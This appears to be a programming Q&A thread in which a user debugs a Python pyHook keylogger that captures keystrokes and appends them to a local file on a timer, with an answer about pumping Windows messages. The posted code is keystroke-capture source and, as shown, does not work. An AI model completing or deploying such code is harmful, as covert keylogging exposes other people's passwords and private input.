# Writing to a file at specific time intervals in different threads for a simple keylogger

Tags: python, multithreading, file, logging, keyboard

```
import pythoncom , pyHook, time

temp_keylogs = ''
def OnKeyboardEvent(event):
    global temp_keylogs
    key = chr(event.Ascii)
    temp_keylogs += key

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
pythoncom.PumpMessages()

while True:
    f = open('output.txt', 'a')
    f.write(temp_keylogs)
    temp_keylogs = ''
    f.close()
    time.sleep(4)
```

I do not understand why this code is not writing all of the keystrokes performed after 4 seconds to a file called 'output.txt'.  No errors are thrown, so it is compiling OK I believe, but it is not writing anything to the file.

***EDIT:***
I added `pythoncom.PumpMessages()` as was suggested, but that essentially gives two while loops; So, do I need threading to do this?

I tried the threaded version out here:

```
import pythoncom , pyHook, time, thread

temp_keylogs = ''
def OnKeyboardEvent(event):
    global temp_keylogs
    key = chr(event.Ascii)
    temp_keylogs += key

def file_write(temp_keylogs):
    while True:
        print 'yes'
        f = open('output.txt', 'a')
        f.write(temp_keylogs)
        f.close()
        temp_keylogs = ''
        time.sleep(4)

hm = pyHook.HookManager()
hm.KeyDown = OnKeyboardEvent
hm.HookKeyboard()
try:
    thread.start_new_thread( file_write, (temp_keylogs,) )
    thread.start_new_thread( pythoncom.PumpMessages() )
except:
    print 'thread not started'
```

But it is still not writing to the file.  So, I'm still unsure  of what is wrong.

Answer (score 1):

You're missing the pump messages

```
pythoncom.PumpMessages()
```

You don't have access to the keys without it. See the [docs](http://sourceforge.net/apps/mediawiki/pyhook/index.php?title=PyHook_Tutorial)

Comment: If I place this line in, however, I never am able to get to my `while` loop, since the `PumpMessages()` is before the loop.  If it is after the `while` loop, `PumpMessages()` will never be seen.